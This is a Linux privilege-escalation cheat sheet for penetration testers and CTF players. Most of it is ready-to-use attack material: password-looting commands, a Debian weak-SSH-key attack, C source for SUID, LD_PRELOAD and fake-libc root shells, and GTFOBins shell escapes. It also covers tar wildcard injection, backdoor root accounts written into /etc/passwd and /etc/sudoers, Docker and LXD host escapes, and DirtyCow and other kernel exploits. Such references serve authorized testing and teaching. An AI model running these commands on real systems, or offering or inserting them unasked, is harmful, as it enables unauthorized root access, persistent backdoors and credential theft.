25 KiB
Linux - Privilege Escalation
Summary
- Tools
- Checklist
- Looting for passwords
- SSH Key
- Scheduled tasks
- SUID
- Capabilities
- SUDO
- GTFOBins
- Wildcard
- Writable files
- NFS Root Squashing
- Shared Library
- Groups
- Kernel Exploits
Tools
-
LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh ./lse.sh -l1 # shows interesting information that should help you to privesc ./lse.sh -l2 # dump all the information it gathers about the system
-
LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
-
BeRoot - Privilege Escalation Project - Windows / Linux / Mac
-
linuxprivchecker.py - a Linux Privilege Escalation Check Script
-
unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check
Checklists
- Kernel and distribution release details
- System Information:
- Hostname
- Networking details:
- Current IP
- Default route details
- DNS server information
- User Information:
- Current user details
- Last logged on users
- Shows users logged onto the host
- List all users including uid/gid information
- List root accounts
- Extracts password policies and hash storage method information
- Checks umask value
- Checks if password hashes are stored in /etc/passwd
- Extract full details for 'default' uid's such as 0, 1000, 1001 etc
- Attempt to read restricted files i.e. /etc/shadow
- List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
- Basic SSH checks
- Privileged access:
- Which users have recently used sudo
- Determine if /etc/sudoers is accessible
- Determine if the current user has Sudo access without a password
- Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
- Is root's home directory accessible
- List permissions for /home/
- Environmental:
- Display current $PATH
- Displays env information
- Jobs/Tasks:
- List all cron jobs
- Locate all world-writable cron jobs
- Locate cron jobs owned by other users of the system
- List the active and inactive systemd timers
- Services:
- List network connections (TCP & UDP)
- List running processes
- Lookup and list process binaries and associated permissions
- List inetd.conf/xined.conf contents and associated binary file permissions
- List init.d binary permissions
- Version Information (of the following):
- Sudo
- MYSQL
- Postgres
- Apache
- Checks user config
- Shows enabled modules
- Checks for htpasswd files
- View www directories
- Default/Weak Credentials:
- Checks for default/weak Postgres accounts
- Checks for default/weak MYSQL accounts
- Searches:
- Locate all SUID/GUID files
- Locate all world-writable SUID/GUID files
- Locate all SUID/GUID files owned by root
- Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
- Locate files with POSIX capabilities
- List all world-writable files
- Find/list all accessible *.plan files and display contents
- Find/list all accessible *.rhosts files and display contents
- Show NFS server details
- Locate *.conf and *.log files containing keyword supplied at script runtime
- List all *.conf files located in /etc
- Locate mail
- Platform/software specific tests:
- Checks to determine if we're in a Docker container
- Checks to see if the host has Docker installed
- Checks to determine if we're in an LXC container
Looting for passwords
Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
Old passwords in /etc/security/opasswd
The /etc/security/opasswd
file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
⚠️ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
Last edited files
Files that were edited in the last 10 minutes
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
In memory passwords
strings /dev/mem -n10 | grep -i PASS
Find sensitive files
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
...
SSH Key
Sensitive files
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
...
SSH Key Predictable PRNG (Authorized_Keys) Process
This module describes how to attempt to use an obtained authorized_keys file on a host system.
Needed : SSH-DSS String from authorized_keys file
Steps
- Get the authorized_keys file. An example of this file would look like so:
ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...
- Since this is an ssh-dss key, we need to add that to our local copy of
/etc/ssh/ssh_config
and/etc/ssh/sshd_config
:
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config
/etc/init.d/ssh restart
- Get g0tmi1k's debian-ssh repository and unpack the keys:
git clone https://github.com/g0tmi1k/debian-ssh
cd debian-ssh
tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
- Grab the first 20 or 30 bytes from the key file shown above starting with the
"AAAA..."
portion and grep the unpacked keys with it as:
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
- IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
And you should connect without requiring a password. If stuck, the -vvv
verbosity should provide enough details as to why.
Scheduled tasks
Cron jobs
Check if you have access with write permission on these files.
Check inside the file, to find other paths with write permissions.
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/sudoers
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root
crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
You can use pspy to detect a CRON job.
# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
Systemd timers
systemctl list-timers --all
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service
Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
SUID
SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is root
, the uid will be changed to root
even if it was executed from user bob
. SUID bit is represented by an s
.
╭─swissky@lab ~
╰─$ ls /usr/bin/sudo -alh
-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo
Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
Create a SUID binary
print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c
gcc -o /tmp/suid /tmp/suid.c
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit
Capabilities
List capabilities of binaries
╭─swissky@lab ~
╰─$ /usr/bin/getcap -r /usr/bin
/usr/bin/fping = cap_net_raw+ep
/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/rlogin = cap_net_bind_service+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/rsh = cap_net_bind_service+ep
/usr/bin/rcp = cap_net_bind_service+ep
Edit capabilities
/usr/bin/setcap -r /bin/ping # remove
/usr/bin/setcap cap_net_raw+p /bin/ping # add
Interesting capabilities
Having the capability =ep means the binary has all the capabilities.
$ getcap openssl /usr/bin/openssl
openssl=ep
Alternatively the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid
Example of privilege escalation with cap_setuid+ep
$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
Capabilities name | Description |
---|---|
CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing |
CAP_AUDIT_WRITE | Helps to write records to kernel auditing log |
CAP_BLOCK_SUSPEND | This feature can block system suspends |
CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs |
CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks |
CAP_DAC_READ_SEARCH | This only bypass file and directory read/execute permission checks |
CAP_FOWNER | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file |
CAP_KILL | Allow the sending of signals to processes belonging to others |
CAP_SETGID | Allow changing of the GID |
CAP_SETUID | Allow changing of the UID |
CAP_SETPCAP | Helps to transferring and removal of current set to any PID |
CAP_IPC_LOCK | This helps to lock memory |
CAP_MAC_ADMIN | Allow MAC configuration or state changes |
CAP_NET_RAW | Use RAW and PACKET sockets |
CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports |
SUDO
Tool: Sudo Exploitation
NOPASSWD
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
In this example the user demo
can run vim
as root
, it is now trivial to get a shell by adding an ssh key into the root directory or by calling sh
.
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
LD_PRELOAD and NOPASSWD
If LD_PRELOAD
is explicitly defined in the sudoers file
Defaults env_keep += LD_PRELOAD
Compile the following shared object using the C code below with gcc -fPIC -shared -o shell.so shell.c -nostartfiles
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
Execute any binary with the LD_PRELOAD to spawn a shell : sudo LD_PRELOAD=<full_path_to_so_file> <program>
, e.g: sudo LD_PRELOAD=/tmp/shell.so find
Doas
There are some alternatives to the sudo
binary such as doas
for OpenBSD, remember to check its configuration at /etc/doas.conf
permit nopass demo as root cmd vim
sudo_inject
Using https://github.com/nongiach/sudo_inject
$ sudo whatever
[sudo] password for user:
# Press <ctrl>+c since you don't have the password.
# This creates an invalid sudo tokens.
$ sh exploit.sh
.... wait 1 seconds
$ sudo -i # no password required :)
# id
uid=0(root) gid=0(root) groups=0(root)
Slides of the presentation : https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf
GTFOBins
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
Wildcard
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
# create file for exploitation
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
# vulnerable script
tar cf archive.tar *
Tool: wildpwn
Writable files
List world writable files on the system.
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
Writable /etc/passwd
First generate a password with one of the following commands.
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Then add the user hacker
and add the generated password.
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
You can now use the su
command with hacker:hacker
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
NOTE: In BSD platforms /etc/passwd
is located at /etc/pwd.db
and /etc/master.passwd
, also the /etc/shadow
is renamed to /etc/spwd.db
.
Writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
NFS Root Squashing
When no_root_squash appears in /etc/exports
, the folder is shareable and a remote user can mount it.
# remote check the name of the folder
showmount -e 10.10.10.10
# create dir
mkdir /tmp/nfsdir
# mount directory
mount -t nfs 10.10.10.10:/shared /tmp/nfsdir
cd /tmp/nfsdir
# copy wanted shell
cp /bin/bash .
# set suid permission
chmod +s bash
Shared Library
ldconfig
Identify shared libraries with ldd
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
Create a library in /tmp
and activate the path.
gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
RPATH
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flag15]
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)
By copying the lib into /var/tmp/flag15/
it will be used by the program in this place as specified in the RPATH
variable.
level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
Then create an evil library in /var/tmp
with gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6
#include<stdlib.h>
#define SHELL "/bin/sh"
int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}
Groups
Docker
Mount the filesystem in a bash container, allowing you to edit the /etc/passwd
as root, then add a backdoor account toor:password
.
$> docker run -it --rm -v $PWD:/mnt bash
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Almost similar but you will also see all processes running on the host and be connected to the same NICs.
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
Or use the following docker image from chrisfosterelli to spawn a root shell
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete
354c3661655e: Pull complete
91930878a2d7: Pull complete
a3ed95caeb02: Pull complete
489b110c54dc: Pull complete
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
More docker privilege escalation using the Docker Socket.
sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
LXC/LXD
The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
╭─swissky@lab ~
╰─$ id
uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
Build an Alpine image and start it using the flag security.privileged=true
, forcing the container to interact as root with the host filesystem.
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
./build-alpine -a i686
# import the image
lxc image import ./alpine.tar.gz --alias myimage
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
Alternatively https://github.com/initstring/lxd_root
Kernel Exploits
Precompiled exploits can be found inside these repositories, run them at your own risk !
The following exploits are known to work well, search for another exploits using searchsploit -w linux kernel centos
.
CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
CVE-2010-3904 (RDS)
Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
CVE-2010-4258 (Full Nelson)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
https://www.exploit-db.com/exploits/15704/
CVE-2012-0056 (Mempodipper)
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
https://www.exploit-db.com/exploits/18411
References
- SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m
- Privilege escalation via Docker - April 22, 2015 - Chris Foster
- An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018
- Exploiting wildcards on Linux - Berislav Kucan
- Code Execution With Tar Command - p4pentest
- Back To The Future: Unix Wildcards Gone Wild - Leon Juranic
- HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018
- Privilege Escalation via lxd - @reboare
- Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018
- Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc